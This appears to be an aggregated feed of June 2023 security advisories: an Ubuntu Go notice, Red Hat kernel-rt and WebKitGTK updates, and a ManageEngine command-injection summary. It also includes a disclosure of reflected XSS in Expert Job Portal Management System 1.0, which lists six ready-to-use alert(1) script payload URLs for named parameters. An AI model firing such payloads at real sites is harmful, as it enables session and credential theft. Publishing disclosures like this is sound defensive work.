Ubuntu Security Notice 6140-1 - It was discovered that Go did not properly manage memory under certain circumstances. An attacker could possibly use this issue to cause a panic resulting in a denial of service. This issue only affected golang-1.19 on Ubuntu 22.10. It was discovered that Go did not properly validate the amount of memory and disk files ReadForm can consume. An attacker could possibly use this issue to cause a panic resulting in a denial of service. This issue only affected golang-1.19 on Ubuntu 22.10.

==========================================================================  
Ubuntu Security Notice USN-6140-1  
June 06, 2023

go vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 23.04  
- Ubuntu 22.10

Summary:

Several security issues were fixed in Go.

Software Description:  
- golang-1.19: Go programming language compiler - metapackage  
- golang-1.20: Go programming language compiler - metapackage

Details:

It was discovered that Go did not properly manage memory under certain  
circumstances. An attacker could possibly use this issue to cause a panic  
resulting in a denial of service. This issue only affected golang-1.19 on  
Ubuntu 22.10. (CVE-2022-41724, CVE-2023-24534, CVE-2023-24537)

It was discovered that Go did not properly validate the amount of memory  
and disk files ReadForm can consume. An attacker could possibly use this  
issue to cause a panic resulting in a denial of service. This issue only  
affected golang-1.19 on Ubuntu 22.10. (CVE-2022-41725)

It was discovered that Go did not properly validate backticks (`) as  
Javascript string delimiters, and did not escape them as expected. An  
attacker could possibly use this issue to inject arbitrary Javascript code  
into the Go template. This issue only affected golang-1.19 on Ubuntu 22.10.  
(CVE-2023-24538)

It was discovered that Go did not properly validate the angle brackets in  
CSS values. An attacker could possibly use this issue to inject arbitrary  
CSS code. (CVE-2023-24539)

It was discovered that Go did not properly validate whitespace characters  
in Javascript, and did not escape them as expected. An attacker could  
possibly use this issue to inject arbitrary Javascript code into the Go  
template. (CVE-2023-24540)

It was discovered that Go did not properly validate HTML attributes with  
empty input. An attacker could possibly use this issue to inject arbitrary  
HTML tags into the Go template. (CVE-2023-29400)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 23.04:  
  golang-1.19                     1.19.8-1ubuntu0.1  
  golang-1.19-go                  1.19.8-1ubuntu0.1  
  golang-1.19-src                 1.19.8-1ubuntu0.1  
  golang-1.20                     1.20.3-1ubuntu0.1  
  golang-1.20-go                  1.20.3-1ubuntu0.1  
  golang-1.20-src                 1.20.3-1ubuntu0.1

Ubuntu 22.10:  
  golang-1.19                     1.19.2-1ubuntu1.1  
  golang-1.19-go                  1.19.2-1ubuntu1.1  
  golang-1.19-src                 1.19.2-1ubuntu1.1

In general, a standard system update will make all the necessary changes.

References:  
  https://ubuntu.com/security/notices/USN-6140-1  
  CVE-2022-41724, CVE-2022-41725, CVE-2023-24534, CVE-2023-24537,  
  CVE-2023-24538, CVE-2023-24539, CVE-2023-24540, CVE-2023-29400

Package Information:  
  https://launchpad.net/ubuntu/+source/golang-1.19/1.19.8-1ubuntu0.1  
  https://launchpad.net/ubuntu/+source/golang-1.20/1.20.3-1ubuntu0.1  
  https://launchpad.net/ubuntu/+source/golang-1.19/1.19.2-1ubuntu1.1

Ubuntu Security Notice USN-6140-1

Red Hat Security Advisory 2023-3462-01 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel-rt security and bug fix update  
Advisory ID:       RHSA-2023:3462-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3462  
Issue date:        2023-06-06  
CVE Names:         CVE-2022-42896   
=====================================================================

1. Summary:

An update for kernel-rt is now available for Red Hat Enterprise Linux 8.4  
Advanced Mission Critical Update Support, Red Hat Enterprise Linux 8.4  
Telecommunications Update Service, and Red Hat Enterprise Linux 8.4 Update  
Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux NFV E4S (v.8.4) - x86_64  
Red Hat Enterprise Linux NFV TUS (v.8.4) - x86_64  
Red Hat Enterprise Linux RT TUS (v.8.4) - x86_64

3. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables  
fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: use-after-free in l2cap_connect and l2cap_le_connect_req in  
net/bluetooth/l2cap_core.c (CVE-2022-42896)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* kernel-rt: update RT source tree to the RHEL-8.4.z17 source tree  
(BZ#2185910)

* RHEL-8.7 kernel-rt: INFO: task deadline_test:2526 blocked for more than  
600 seconds. (BZ#2188652)

* Crash: kernel BUG at kernel/locking/rtmutex.c:1338! (BZ#2188725)

* kernel-rt: workqueue: Fix divergence from stock 8.4 (BZ#2209152)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2147364 - CVE-2022-42896 kernel: use-after-free in l2cap_connect and l2cap_le_connect_req in net/bluetooth/l2cap_core.c

6. Package List:

Red Hat Enterprise Linux NFV E4S (v.8.4):

Source:  
kernel-rt-4.18.0-305.91.1.rt7.166.el8_4.src.rpm

x86_64:  
kernel-rt-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-core-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-core-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-debuginfo-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-devel-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-kvm-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-modules-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-modules-extra-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debuginfo-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-devel-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-kvm-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-modules-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-modules-extra-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm

Red Hat Enterprise Linux NFV TUS (v.8.4):

Source:  
kernel-rt-4.18.0-305.91.1.rt7.166.el8_4.src.rpm

x86_64:  
kernel-rt-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-core-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-core-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-debuginfo-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-devel-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-kvm-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-modules-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-modules-extra-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debuginfo-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-devel-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-kvm-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-modules-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-modules-extra-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm

Red Hat Enterprise Linux RT TUS (v.8.4):

Source:  
kernel-rt-4.18.0-305.91.1.rt7.166.el8_4.src.rpm

x86_64:  
kernel-rt-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-core-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-core-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-debuginfo-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-devel-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-modules-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debug-modules-extra-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debuginfo-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-devel-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-modules-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm  
kernel-rt-modules-extra-4.18.0-305.91.1.rt7.166.el8_4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-42896  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZH8ffNzjgjWX9erEAQgyzQ//ePc2fU5umHOIMReDPuiaMY7szYylgtmi  
x2gO6L9pgdS9eveUQjsiBK4Clin+7MIX1RTa0Kr+QzC+VCo+4SRP85vE/WDXwEI1  
usJ23fZH2CUURcy38ejG7Cw+xQbFQWnhoFAl0s8TZbLAzKo4CNoVf0FtLrwGif/x  
KadeI4bpdI9kjnVqjdraIaUJeTGAaLH6oKfCBimgTudV1hpOYJF7nO7gnr2Jn9fh  
o1Wa5VXj+z33U6+l6SEVcUtCXRrWIpuwVa47Nan5vAdD5I3tQQbWhsac9AUWF5GO  
KJBdJl8hF3nEYtyQWWlgtg6wQce1WwQCEJBE2ZKjOjz/ppxE8+X9sZnm3GRsTd47  
CvtB7SiMlDAVpSPs6ILahXpQwXCnW0Nhg/Egs5K6QBtVGi1/06h1oSRKuToa6B+v  
0E6USqCbehmneZAs+SfwOcD5de4VmuVS1pCfc905eO+DdWWyA7Zfu6kofYlpxFCU  
+z/GUKj5xyMZgOV6TpJNDrmHuvaaoheNyYdh7kf9d5QYElyrBb/o0UinzGkNghAP  
lrcyKis3NsGxcH0kNkNt6k+Q3g2zLa42OdA7JxtgfoXK/2mpXHTeqxd2RuZrp87G  
qCI2oFQv/20OG6APwESBC0ae3ipF9sZA9do4Y1LrI44pdsBBif3TXBX5HGkmDhit  
VTe8HYqeOrw=  
=lylS  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3462-01

Red Hat Security Advisory 2023-3461-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system. Issues addressed include a use-after-free vulnerability.

Red Hat Security Advisory 2023-3461-01

Expert Job Portal Management System version 1.0 suffers from a cross site scripting vulnerability.

┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
││                                     C r a C k E r                                    ┌┘  
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                  [ Vulnerability ]                                   ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:  Author   : CraCkEr                                                                    :  
│  Website  : https://www.codester.com/items/20720/                                      │  
│  Vendor   : Expert IT Solution                                                         │  
│  Software : Expert Job Portal Management System 1.0                                    │  
│  Vuln Type: Reflected XSS                                                              │  
│  Impact   : Manipulate the content of the site                                         │  
│                                                                                        │  
│────────────────────────────────────────────────────────────────────────────────────────│  
│                                                                                       ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘  
:                                                                                        :  
│  Release Notes:                                                                        │  
│  ═════════════                                                                         │  
│  The attacker can send to victim a link containing a malicious URL in an email or      │  
│  instant message can perform a wide variety of actions, such as stealing the victim's  │  
│  session token or login credentials                                                    │  
│                                                                                        │  
┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                                                                      ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   

         CryptoJob (Twitter) twitter.com/0x0CryptoJob

     ┌┌───────────────────────────────────────────────────────────────────────────────────────┐  
┌┘                                    © CraCkEr 2023                                    ┌┘  
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Path: /catgeory.php 

GET parameter 'cate_name' is vulnerable to RXSS

https://website/catgeory.php?cate_name=Accounting%2fFinancexpy42%3cscript%3ealert(1)%3c%2fscript%3ey4al4

Path: /city.php

GET parameter 'city' is vulnerable to RXSS

https://website/city.php?city=Barisaln59xr%3cscript%3ealert(1)%3c%2fscript%3eqtv0k

Path: /company_type_info.php

GET parameter 'com_type' is vulnerable to RXSS

https://website/company_type_info.php?com_type=Agentitub5%3cscript%3ealert(1)%3c%2fscript%3ehvwa4

Path: /division.php

GET parameter 'd' is vulnerable to RXSS

https://website/division.php?d=Chittagong%20Divisionnxxkk%3cscript%3ealert(1)%3c%2fscript%3egadkq

Path: /country.php

GET parameter 'c' is vulnerable to RXSS

https://website/country.php?c=tjof1%22%3e%3cscript%3ealert(1)%3c%2fscript%3eky8lq

Path: /trainning_list.php

GET parameter 'category_nametra' is vulnerable to RXSS

https://website/trainning_list.php?category_nametra=ITpuvvx%3cscript%3ealert(1)%3c%2fscript%3enpn2x

[-] Done

Expert Job Portal Management System 1.0 Cross Site Scripting

Red Hat Security Advisory 2023-3470-01 - The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements. Issues addressed include privilege escalation and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel-rt security and bug fix update  
Advisory ID:       RHSA-2023:3470-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3470  
Issue date:        2023-06-06  
CVE Names:         CVE-2023-0461 CVE-2023-2008 CVE-2023-32233   
=====================================================================

1. Summary:

An update for kernel-rt is now available for Red Hat Enterprise Linux 9.0  
Extended Update Support.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Real Time EUS (v.9.0) - x86_64  
Red Hat Enterprise Linux Real Time for NFV EUS (v.9.0) - x86_64

3. Description:

The kernel-rt packages provide the Real Time Linux Kernel, which enables  
fine-tuning for systems with extremely high determinism requirements.

Security Fix(es):

* kernel: net/ulp: use-after-free in listening ULP sockets (CVE-2023-0461)

* kernel: udmabuf: improper validation of array index leading to local  
privilege escalation (CVE-2023-2008)

* kernel: netfilter: use-after-free in nf_tables when processing batch  
requests can lead to privilege escalation (CVE-2023-32233)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* kernel-rt-debug: BUG: MAX_LOCKDEP_CHAINS too low (BZ#2181286)

* kernel-rt: update RT source tree to the latest RHEL-9.0.z9 Batch  
(BZ#2186491)

* kernel-rt: INFO: task deadline_test:1778 blocked for more than 622  
seconds (BZ#2188662)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2176192 - CVE-2023-0461 kernel: net/ulp: use-after-free in listening ULP sockets  
2186862 - CVE-2023-2008 kernel: udmabuf: improper validation of array index leading to local privilege escalation  
2196105 - CVE-2023-32233 kernel: netfilter: use-after-free in nf_tables when processing batch requests can lead to privilege escalation

6. Package List:

Red Hat Enterprise Linux Real Time for NFV EUS (v.9.0):

Source:  
kernel-rt-5.14.0-70.58.1.rt21.129.el9_0.src.rpm

x86_64:  
kernel-rt-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-core-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-debug-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-debug-core-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-debug-debuginfo-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-debug-devel-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-debug-kvm-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-debug-modules-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-debug-modules-extra-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-debuginfo-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-devel-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-kvm-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-modules-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-modules-extra-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm

Red Hat Enterprise Linux Real Time EUS (v.9.0):

Source:  
kernel-rt-5.14.0-70.58.1.rt21.129.el9_0.src.rpm

x86_64:  
kernel-rt-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-core-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-debug-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-debug-core-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-debug-debuginfo-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-debug-devel-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-debug-modules-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-debug-modules-extra-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-debuginfo-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-debuginfo-common-x86_64-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-devel-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-modules-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm  
kernel-rt-modules-extra-5.14.0-70.58.1.rt21.129.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-0461  
https://access.redhat.com/security/cve/CVE-2023-2008  
https://access.redhat.com/security/cve/CVE-2023-32233  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZH8fc9zjgjWX9erEAQixqg//TKjSUs6S1BZfD0fAMLRlETm8X+zQSko2  
/0J2pHxC77zfwa4Tdf0vgCx9WDOzrZE8OQwPU7rchBIRLd/3LZyaVpw88ujtkO7z  
gmTE1EVBOrNrQF4UsZvvI1DhIIjHJTgyA0YZu6k3SnSJ3WCVLJvZoiFMMFJwE3BT  
qFZUe78WC/KwSM2sNsnyPiHEbkv5sIU/nCpHdf0CuriSNaOmf8vYhB5lO4w5+D3G  
pe4ebCa/urh0PRY9XAvlcneN6JhAhrGKerdx2U3M1JV2xLUi6GEiTUabQwaWsIeP  
pTOMQ13b2+0Dx2yGjNVGb4BiNczq1J+4xC2Y6agGhsrEjS25cTs/+VUIU7u55Z6v  
ekZXQqqszCWpmzbFtsPB2piRVswywCcv5C3H+PjIkwtb/ZXt6s0wf15EXubp70Pk  
nxWMI3bDuZKWGqV4QJ0WjCyv9ZrZ07Z/tz/x5+G7W8dsz5NYOd57QWVOH1N8abJe  
0BAn/wxLiovVp8SVXvFhv62HgD0jwWCm/2Qnnk8vUpz14o4WDhazki2n240fG/to  
Gf4V9+u59QhSJoqm15Wn8TdagXGtAJpoF4035uxIsDc6qitqfgUdr+/QKdS1DHbw  
dteCG6cCVXKsdiAP5sLoZc1TLIL7rsW24mKemHx/WA97wYdyfOq1lUR5YyvcZupy  
uaJN7YNDHbs=  
=rdIS  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3470-01

Red Hat Security Advisory 2023-3433-01 - WebKitGTK is the port of the portable web rendering engine WebKit to the GTK platform. Issues addressed include out of bounds read and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: webkit2gtk3 security update  
Advisory ID:       RHSA-2023:3433-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:3433  
Issue date:        2023-06-05  
CVE Names:         CVE-2023-28204 CVE-2023-32373   
=====================================================================

1. Summary:

An update for webkit2gtk3 is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64

3. Description:

WebKitGTK is the port of the portable web rendering engine WebKit to the  
GTK platform.

Security Fix(es):

* webkitgtk: a use-after-free when processing maliciously crafted web  
content (CVE-2023-32373)

* webkitgtk: an out-of-bounds read when processing malicious content  
(CVE-2023-28204)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2209208 - CVE-2023-28204 webkitgtk: an out-of-bounds read when processing malicious content  
2209214 - CVE-2023-32373 webkitgtk: a use-after-free when processing maliciously crafted web content

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

Source:  
webkit2gtk3-2.38.5-1.el8_8.4.src.rpm

aarch64:  
webkit2gtk3-2.38.5-1.el8_8.4.aarch64.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el8_8.4.aarch64.rpm  
webkit2gtk3-debugsource-2.38.5-1.el8_8.4.aarch64.rpm  
webkit2gtk3-devel-2.38.5-1.el8_8.4.aarch64.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el8_8.4.aarch64.rpm  
webkit2gtk3-jsc-2.38.5-1.el8_8.4.aarch64.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el8_8.4.aarch64.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el8_8.4.aarch64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el8_8.4.aarch64.rpm

ppc64le:  
webkit2gtk3-2.38.5-1.el8_8.4.ppc64le.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el8_8.4.ppc64le.rpm  
webkit2gtk3-debugsource-2.38.5-1.el8_8.4.ppc64le.rpm  
webkit2gtk3-devel-2.38.5-1.el8_8.4.ppc64le.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el8_8.4.ppc64le.rpm  
webkit2gtk3-jsc-2.38.5-1.el8_8.4.ppc64le.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el8_8.4.ppc64le.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el8_8.4.ppc64le.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el8_8.4.ppc64le.rpm

s390x:  
webkit2gtk3-2.38.5-1.el8_8.4.s390x.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el8_8.4.s390x.rpm  
webkit2gtk3-debugsource-2.38.5-1.el8_8.4.s390x.rpm  
webkit2gtk3-devel-2.38.5-1.el8_8.4.s390x.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el8_8.4.s390x.rpm  
webkit2gtk3-jsc-2.38.5-1.el8_8.4.s390x.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el8_8.4.s390x.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el8_8.4.s390x.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el8_8.4.s390x.rpm

x86_64:  
webkit2gtk3-2.38.5-1.el8_8.4.i686.rpm  
webkit2gtk3-2.38.5-1.el8_8.4.x86_64.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el8_8.4.i686.rpm  
webkit2gtk3-debuginfo-2.38.5-1.el8_8.4.x86_64.rpm  
webkit2gtk3-debugsource-2.38.5-1.el8_8.4.i686.rpm  
webkit2gtk3-debugsource-2.38.5-1.el8_8.4.x86_64.rpm  
webkit2gtk3-devel-2.38.5-1.el8_8.4.i686.rpm  
webkit2gtk3-devel-2.38.5-1.el8_8.4.x86_64.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el8_8.4.i686.rpm  
webkit2gtk3-devel-debuginfo-2.38.5-1.el8_8.4.x86_64.rpm  
webkit2gtk3-jsc-2.38.5-1.el8_8.4.i686.rpm  
webkit2gtk3-jsc-2.38.5-1.el8_8.4.x86_64.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el8_8.4.i686.rpm  
webkit2gtk3-jsc-debuginfo-2.38.5-1.el8_8.4.x86_64.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el8_8.4.i686.rpm  
webkit2gtk3-jsc-devel-2.38.5-1.el8_8.4.x86_64.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el8_8.4.i686.rpm  
webkit2gtk3-jsc-devel-debuginfo-2.38.5-1.el8_8.4.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2023-28204  
https://access.redhat.com/security/cve/CVE-2023-32373  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZH54S9zjgjWX9erEAQik3A/+IpcsSu+L3IB36Z1OGQp+3Ub+9kJQ32iq  
q683C4Md3OK5k8MBLO2lry3iRwz++Dr6sYJnUkzgehxvDbg/EEjVajGy3XkOt4gH  
z4NLf9ANS6uxGbH4vAyh58y4eUCwcFDAmbQ4mls/vsCUj/nWLtYYwkPurq8UT0tC  
A2Wkdy74Qy6S6x9sPMFhjX6/IxLEbyT4zspxoV3w04Hkv8JhGGc6N48d7TZkc0wL  
ta8p2J9J2zs44MxpAOpO1CUemZouLDAGYIFZK0OuqiD4PGJO1zrKvpxklK2iQb8L  
Xo5E3AOeqA9OypynpFp3+/qM7kdLKkN4iGeh4OyyBF1d2/qfEF4yhy8L0ZB1Jngz  
o78+8uB01skD3lLsz+hrln7IF7WWQKClS2nLhiplTM+PRiwVU0OfaB4cX3aQI0CH  
uoO4846LV6GJssLUax9LsBVAu3tM4PeYvb1Ci0dScsvxb8MO+UFuqwYDRh76IJWK  
xYEmDYC6dgcDvnUbiky99OENpJZte9t19pA9x/T3oPYw//DkIBxL8oYqxPDfMo4z  
uO2NavUxK4VWoX/qPZ2cMEEDvAJH6EpSvzur0vX97I42+RKYuds6VuF2gifv5EeD  
7QKKK7zm2xdkMiJVMq5wo7tIPhud5miXU6QUXxD08EAf0KbSjlt6OrTViluaGcOA  
wjHPL3ZkmgQ=  
=cMOt  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-3433-01

ManageEngine ADManager Plus versions prior to build 7181 are vulnerable to an authenticated command injection vulnerability due to insufficient validation of user input when performing the ChangePasswordAction function before passing it into a string that is later used as an OS command to execute.

